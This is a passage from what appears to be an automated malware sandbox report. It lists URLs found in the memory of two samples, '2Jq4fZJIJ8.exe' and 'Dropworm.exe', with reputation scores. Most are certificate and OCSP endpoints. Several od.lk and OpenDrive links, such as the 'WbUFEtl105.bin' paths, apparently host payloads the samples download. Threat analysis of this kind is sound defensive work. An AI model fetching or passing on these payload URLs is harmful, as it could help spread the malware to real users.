            http://certificates.starfieldtech.com/repository/0 | 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.0000000003368000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmp | false | | high
            http://ocsp.starfieldtechZ | Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.binq | Dropworm.exe, 0000000C.00000002.2433018640.0000000003387000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.binr | 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033A3000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1904180717.00000000033A3000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bins | Dropworm.exe, 0000000C.00000002.2433018640.00000000033C4000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://od.lk/or/ | 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://web.opendrive.com/api/file/info.json/MzdfMzIxNzQ4MzhfWGo3SW8?sharing_id= | 2Jq4fZJIJ8.exe, 00000008.00000003.1971631485.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1663721780.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2036334999.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1817986444.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2136016965.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1753723572.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2194439736.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000003.2178764189.000000000341C000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003412000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433540354.00000000050C0000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://crl.starfieldtech.com/sfig2s1-775.crl0c | 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.0000000003368000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmp | false | | high
            http://ocsp.starfieldtech.com/08 | 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://od.lk/l | Dropworm.exe, 0000000C.00000002.2433018640.0000000003412000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://www.opendrive.com | 2Jq4fZJIJ8.exe, 00000008.00000003.1971631485.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1663721780.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2036334999.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1817986444.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2136016965.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1753723572.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2194439736.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000003.2178764189.000000000341C000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433540354.00000000050C0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://ocsp.starfieldtech.com/0; | 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://web.opendrive.com/api/ | 2Jq4fZJIJ8.exe, 00000008.00000003.1904180717.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433540354.00000000050C0000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://od.lk/o | 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp | false | | high
            http://ocsp.starfieldtech.com/0F | 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.0000000003368000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.